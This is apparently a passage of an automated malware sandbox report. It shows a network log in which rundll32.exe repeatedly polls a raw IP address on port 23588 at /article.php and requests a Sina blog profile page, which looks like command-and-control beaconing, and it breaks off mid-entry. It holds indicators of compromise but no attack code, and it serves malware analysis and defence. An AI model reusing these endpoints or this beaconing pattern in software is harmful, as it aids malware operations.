                                                                                                                                          41192.168.2.550373116.133.8.92805400C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 19, 2024 15:34:34.648057938 CET118OUTGET /u/5762479093 HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                                                                                                          Host: blog.sina.com.cn
                                                                                                                                          Dec 19, 2024 15:34:37.014148951 CET371INHTTP/1.1 302 Moved Temporarily
                                                                                                                                          Server: nginx/1.2.8
                                                                                                                                          Date: Thu, 19 Dec 2024 14:34:36 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Content-Length: 160
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Location: https://blog.sina.com.cn/u/5762479093
                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                          Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          42192.168.2.550374107.160.131.254235885400C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 19, 2024 15:34:34.649018049 CET187OUTGET /article.php HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                          Host: 107.160.131.254:23588
                                                                                                                                          Cache-Control: no-cache


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          43192.168.2.550436107.160.131.254235885400C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 19, 2024 15:34:38.644294977 CET187OUTGET /article.php HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                          Host: 107.160.131.254:23588
                                                                                                                                          Cache-Control: no-cache


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          44192.168.2.550442116.133.8.92805400C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 19, 2024 15:34:38.750360012 CET118OUTGET /u/5762479093 HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                                                                                                          Host: blog.sina.com.cn
                                                                                                                                          Dec 19, 2024 15:34:40.492660999 CET371INHTTP/1.1 302 Moved Temporarily
                                                                                                                                          Server: nginx/1.2.8
                                                                                                                                          Date: Thu, 19 Dec 2024 14:34:40 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Content-Length: 160
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Location: https://blog.sina.com.cn/u/5762479093
                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                          Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          45192.168.2.550443107.160.131.254235885400C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 19, 2024 15:34:38.750665903 CET187OUTGET /article.php HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                          Host: 107.160.131.254:23588
                                                                                                                                          Cache-Control: no-cache


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          46192.168.2.550510107.160.131.254235885400C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 19, 2024 15:34:42.637887955 CET187OUTGET /article.php HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                          Host: 107.160.131.254:23588
                                                                                                                                          Cache-Control: no-cache


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          47192.168.2.550514116.133.8.92805400C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 19, 2024 15:34:42.751437902 CET118OUTGET /u/5762479093 HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                                                                                                          Host: blog.sina.com.cn
                                                                                                                                          Dec 19, 2024 15:34:44.460810900 CET371INHTTP/1.1 302 Moved Temporarily
                                                                                                                                          Server: nginx/1.2.8
                                                                                                                                          Date: Thu, 19 Dec 2024 14:34:44 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Content-Length: 160
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Location: https://blog.sina.com.cn/u/5762479093
                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                          Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          48192.168.2.550515107.160.131.254235885400C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 19, 2024 15:34:42.751759052 CET187OUTGET /article.php HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                          Host: 107.160.131.254:23588
                                                                                                                                          Cache-Control: no-cache


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          49192.168.2.550597107.160.131.254235885400C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 19, 2024 15:34:46.948242903 CET187OUTGET /article.php HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                          Host: 107.160.131.254:23588
                                                                                                                                          Cache-Control: no-cache


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          50192.168.2.550599116.133.8.92805400C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 19, 2024 15:34:46.948417902 CET118OUTGET /u/5762479093 HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                                                                                                          Host: blog.sina.com.cn
                                                                                                                                          Dec 19, 2024 15:34:50.609566927 CET371INHTTP/1.1 302 Moved Temporarily
                                                                                                                                          Server: nginx/1.2.8
                                                                                                                                          Date: Thu, 19 Dec 2024 14:34:50 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Content-Length: 160
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Location: https://blog.sina.com.cn/u/5762479093
                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                          Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          51192.168.2.550600107.160.131.254235885400C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 19, 2024 15:34:46.948545933 CET187OUTGET /article.php HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                          Host: 107.160.131.254:23588
                                                                                                                                          Cache-Control: no-cache


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          52192.168.2.550690107.160.131.254235885400C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 19, 2024 15:34:50.678437948 CET187OUTGET /article.php HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                          Host: 107.160.131.254:23588
                                                                                                                                          Cache-Control: no-cache


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          53192.168.2.550692107.160.131.254235885400C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 19, 2024 15:34:50.783268929 CET187OUTGET /article.php HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                          Host: 107.160.131.254:23588
                                                                                                                                          Cache-Control: no-cache


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          54192.168.2.550694116.133.8.92805400C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 19, 2024 15:34:50.801126957 CET118OUTGET /u/5762479093 HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                                                                                                          Host: blog.sina.com.cn


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          55192.168.2.550815107.160.131.254235885400C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 19, 2024 15:34:54.687002897 CET187OUTGET /article.php HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                          Host: 107.160.131.254:23588
                                                                                                                                          Cache-Control: no-cache


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          56192.168.2.550820107.160.131.254235885400C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 19, 2024 15:34:54.800615072 CET187OUTGET /article.php HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                          Host: 107.160.131.254:23588
                                                                                                                                          Cache-Control: no-cache


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          57192.168.2.550821116.133.8.92805400C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 19, 2024 15:34:54.800981998 CET118OUTGET /u/5762479093 HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                                                                                                          Host: blog.sina.com.cn


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          58192.168.2.550962107.160.131.254235885400C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 19, 2024 15:34:58.704050064 CET187OUTGET /article.php HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                          Host: 107.160.131.254:23588
                                                                                                                                          Cache-Control: no-cache


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          59192.168.2.550967107.160.131.254235885400C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 19, 2024 15:34:58.814078093 CET187OUTGET /article.php HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                          Host: 107.160.131.254:23588
                                                                                                                                          Cache-Control: no-cache


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          60192.168.2.550968116.133.8.92805400C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 19, 2024 15:34:58.815144062 CET118OUTGET /u/5762479093 HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                                                                                                          Host: blog.sina.com.cn
                                                                                                                                          Dec 19, 2024 15:35:00.530720949 CET371INHTTP/1.1 302 Moved Temporarily
                                                                                                                                          Server: nginx/1.2.8
                                                                                                                                          Date: Thu, 19 Dec 2024 14:35:00 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Content-Length: 160
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Location: https://blog.sina.com.cn/u/5762479093
                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                          Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          61192.168.2.551148107.160.131.254235885400C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 19, 2024 15:35:02.731898069 CET187OUTGET /article.php HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                          Host: 107.160.131.254:23588
                                                                                                                                          Cache-Control: no-cache


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          62192.168.2.551158107.160.131.254235885400C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 19, 2024 15:35:02.858628035 CET187OUTGET /article.php HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                          Host: 107.160.131.254:23588
                                                                                                                                          Cache-Control: no-cache


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          63192.168.2.551159116.133.8.92805400C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 19, 2024 15:35:02.858999014 CET118OUTGET /u/5762479093 HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                                                                                                          Host: blog.sina.com.cn
                                                                                                                                          Dec 19, 2024 15:35:04.602087975 CET371INHTTP/1.1 302 Moved Temporarily
                                                                                                                                          Server: nginx/1.2.8
                                                                                                                                          Date: Thu, 19 Dec 2024 14:35:04 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Content-Length: 160
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Location: https://blog.sina.com.cn/u/5762479093
                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                          Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          64192.168.2.551331107.160.131.254235885400C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 19, 2024 15:35:06.982213974 CET187OUTGET /article.php HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                          Host: 107.160.131.254:23588
                                                                                                                                          Cache-Control: no-cache


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          65192.168.2.551337107.160.131.254235885400C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 19, 2024 15:35:07.116161108 CET187OUTGET /article.php HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                          Host: 107.160.131.254:23588
                                                                                                                                          Cache-Control: no-cache


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          66192.168.2.551338116.133.8.92805400C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 19, 2024 15:35:07.122026920 CET118OUTGET /u/5762479093 HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                                                                                                          Host: blog.sina.com.cn
                                                                                                                                          Dec 19, 2024 15:35:08.941135883 CET371INHTTP/1.1 302 Moved Temporarily
                                                                                                                                          Server: nginx/1.2.8
                                                                                                                                          Date: Thu, 19 Dec 2024 14:35:08 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Content-Length: 160
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Location: https://blog.sina.com.cn/u/5762479093
                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                          Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          67192.168.2.551553107.160.131.254235885400C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 19, 2024 15:35:11.125632048 CET187OUTGET /article.php HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                          Host: 107.160.131.254:23588
                                                                                                                                          Cache-Control: no-cache


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          68192.168.2.551561107.160.131.254235885400C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 19, 2024 15:35:11.248106956 CET187OUTGET /article.php HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                          Host: 107.160.131.254:23588
                                                                                                                                          Cache-Control: no-cache


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          69192.168.2.551564116.133.8.92805400C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 19, 2024 15:35:11.264411926 CET118OUTGET /u/5762479093 HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                                                                                                          Host: blog.sina.com.cn
                                                                                                                                          Dec 19, 2024 15:35:13.774283886 CET371INHTTP/1.1 302 Moved Temporarily
                                                                                                                                          Server: nginx/1.2.8
                                                                                                                                          Date: Thu, 19 Dec 2024 14:35:13 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Content-Length: 160
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Location: https://blog.sina.com.cn/u/5762479093
                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                          Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          70192.168.2.551803107.160.131.254235885400C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 19, 2024 15:35:15.263513088 CET187OUTGET /article.php HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                          Host: 107.160.131.254:23588
                                                                                                                                          Cache-Control: no-cache


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          71192.168.2.551810107.160.131.254235885400C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 19, 2024 15:35:15.378885984 CET187OUTGET /article.php HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                          Host: 107.160.131.254:23588
                                                                                                                                          Cache-Control: no-cache


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          72192.168.2.551811116.133.8.92805400C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 19, 2024 15:35:15.380764008 CET118OUTGET /u/5762479093 HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                                                                                                          Host: blog.sina.com.cn
                                                                                                                                          Dec 19, 2024 15:35:17.090538979 CET371INHTTP/1.1 302 Moved Temporarily
                                                                                                                                          Server: nginx/1.2.8
                                                                                                                                          Date: Thu, 19 Dec 2024 14:35:16 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Content-Length: 160
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Location: https://blog.sina.com.cn/u/5762479093
                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                          Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          73192.168.2.552806107.160.131.254235885400C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 19, 2024 15:35:19.306094885 CET187OUTGET /article.php HTTP/1.1
